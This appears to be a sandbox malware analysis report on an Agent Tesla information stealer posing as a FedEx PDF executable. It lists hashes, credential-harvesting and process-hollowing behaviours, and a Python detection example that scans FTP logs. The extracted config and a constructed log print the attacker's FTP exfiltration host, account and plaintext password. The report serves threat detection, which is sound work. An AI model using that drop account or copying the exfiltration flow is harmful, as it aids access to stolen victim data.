General
Target: 8a9730571569678290789c40e0b578d09be5d2d5550f101d85c14c16ba770748
Size: 1.0MB
Sample: 220521-m76qzagchj
MD5: 5ff4a422bda50b61b8667bb1ff337e82
SHA1: c769502af540ea51c3387ea365365a02e800e683
SHA256: 8a9730571569678290789c40e0b578d09be5d2d5550f101d85c14c16ba770748
SHA512: cf70598663311ab51b71c28370f8f8028ef5d1644b3c3d7abbe128fce8c3a0242ae5078ec9aa3433933038afec89107964dcd5e03cac47d506af8c1b5491a4c7
Static task: static1
Behavioral task: behavioral1
Sample: ????????????? FedEx-pdf.exe
Resource: win7-20220414-en
Behavioral task: behavioral2
Sample: ????????????? FedEx-pdf.exe
Resource: win10v2004-20220414-en
Malware Config
Extracted
agenttesla
Protocol: ftp
Host: ftp://ftp.kassohome.com.tr/
Port: 21
Username: bringlogs@kassohome.com.tr
Password: J%jCb2L=!5~E
This is the attacker's FTP drop account for stolen data. Treat the host and account name as network indicators to block and alert on; do not use them as a login to try.
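As an added example (not part of the sandbox report), the Python below parses the extracted config text in the flattened form the page prints it, normalises it into indicators, and runs a stateful check over FTP control-channel log lines to separate mere contact with the drop server from a login with the extracted account and a subsequent upload. The log line format, the session lines and the uploaded filename are constructed for this example and are not output of any real tool or observation from the sandbox run.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import urlparse

# The config block as the report prints it (line breaks collapsed by extraction).
CONFIG_TEXT = (
    "Protocol: ftp- Host: ftp://ftp.kassohome.com.tr/ - Port: 21 - "
    "Username: bringlogs@kassohome.com.tr - Password: J%jCb2L=!5~E"
)

FIELD_RE = re.compile(r"\b(Protocol|Host|Port|Username|Password):\s*")


def parse_config(text: str) -> Dict[str, str]:
    """Turn the flattened 'Key: value - Key: value' run into a dict.

    re.split with a capturing group yields [prefix, key, value, key, value, ...];
    each value still carries the ' - ' separator that precedes the next key,
    so that is stripped. Values are otherwise kept verbatim (the password
    contains punctuation that must not be touched).
    """
    parts = FIELD_RE.split(text)
    return {
        key.lower(): raw.strip().rstrip("-").strip()
        for key, raw in zip(parts[1::2], parts[2::2])
    }


def exfil_iocs(cfg: Dict[str, str]) -> Dict[str, object]:
    """Normalise the parsed config into the indicators a detection needs."""
    return {
        "protocol": cfg["protocol"],
        "hostname": urlparse(cfg["host"]).hostname or cfg["host"],
        "port": int(cfg["port"]),
        "username": cfg["username"],
        "password": cfg["password"],
    }


# Constructed FTP control-channel log in a hypothetical format:
# "<ts> <src> -> <dst_host>:<port> <COMMAND> [arg]".
# The STOR filename is made up, not a filename observed in the sandbox.
SESSION_LOG = """\
2022-05-21T10:02:11Z 10.0.0.5 -> ftp.example.net:21 USER anonymous
2022-05-21T10:02:11Z 10.0.0.5 -> ftp.example.net:21 PASS guest@
2022-05-21T10:03:40Z 10.0.0.5 -> ftp.kassohome.com.tr:21 USER bringlogs@kassohome.com.tr
2022-05-21T10:03:40Z 10.0.0.5 -> ftp.kassohome.com.tr:21 PASS J%jCb2L=!5~E
2022-05-21T10:03:41Z 10.0.0.5 -> ftp.kassohome.com.tr:21 STOR PW_victim-host.html
2022-05-21T10:05:02Z 10.0.0.7 -> ftp.kassohome.com.tr:21 USER webmaster
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>[^:\s]+):(?P<port>\d+) "
    r"(?P<cmd>\S+)(?: (?P<arg>.*))?$"
)


def scan_ftp_log(log: str, ioc: Dict[str, object]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, source, verdict) for every line aimed at the drop server.

    Verdicts, weakest to strongest:
      contact           any command sent to the configured host:port
      username-match    USER with the extracted account name
      credential-match  PASS with the extracted password after a matching USER
      upload            STOR after credential-match (the exfiltration itself)
    State is tracked per source address so a PASS or STOR is only escalated
    when that client actually authenticated with the extracted account.
    """
    findings: List[Tuple[str, str, str]] = []
    user_sent: set = set()
    authed: set = set()
    for line in log.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # tolerate unrelated or malformed lines
        if m["dst"] != ioc["hostname"] or int(m["port"]) != ioc["port"]:
            continue
        src, cmd, arg = m["src"], m["cmd"].upper(), m["arg"] or ""
        verdict = "contact"
        if cmd == "USER" and arg == ioc["username"]:
            user_sent.add(src)
            verdict = "username-match"
        elif cmd == "PASS" and src in user_sent and arg == ioc["password"]:
            authed.add(src)
            verdict = "credential-match"
        elif cmd == "STOR" and src in authed:
            verdict = "upload"
        findings.append((m["ts"], src, verdict))
    return findings


if __name__ == "__main__":
    ioc = exfil_iocs(parse_config(CONFIG_TEXT))
    print("indicators:", ioc)
    for ts, src, verdict in scan_ftp_log(SESSION_LOG, ioc):
        print(f"{ts} {src} {verdict}")
```

The per-source state matters in practice: a PASS value alone is a weak signal (clients retry, and many samples share drop servers), whereas USER followed by the matching PASS and a STOR from the same client is the exfiltration itself and deserves the highest severity.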
Targets
Target: ????????????? FedEx-pdf.exe
Size: 1.4MB
MD5: cd5f67b3a7d561a47a7896e9b8bc3a6a
SHA1: 223b276114143e3704e95964e91d02a8af277753
SHA256: 6fb3eca3bc35ceba9ce806f93a2855cec717897923851643f40e62dcecc2f14f
SHA512: ee9ca4ed880b58d1d60b169342d98d49d4595a2b757dedfbce78841325524e9c17e9e69c4c029dc3c3050528a9eb93a0d6cb6d2c82fefc7f6d2afa99cbc83a9a
These hashes identify the executable that ran in the behavioral tasks. They differ from the submission hashes under General (1.0MB, SHA256 8a9730571569678290789c40e0b578d09be5d2d5550f101d85c14c16ba770748), so pivot on the SHA256 here for the PE itself and on the one above for the submitted file.
AgentTesla
Agent Tesla is a .NET (Visual Basic) information stealer and remote access tool (RAT). It harvests saved credentials from browsers, mail and FTP clients, logs keystrokes and clipboard contents, and exfiltrates over SMTP, FTP or HTTP; the extracted config above shows this sample using FTP.
AgentTesla Payload
Accesses Microsoft Outlook profiles
The sample reads the Outlook profile keys under HKCU\Software\Microsoft\Office\<version>\Outlook\Profiles, where stored mail account settings and credentials live; this is Agent Tesla's mail credential harvesting.
Suspicious use of SetThreadContext
SetThreadContext on a thread of another process (typically one created suspended) is the step process hollowing (RunPE) loaders use to redirect execution to injected code, so the final payload likely runs inside a hollowed host process rather than in the dropped file's own image.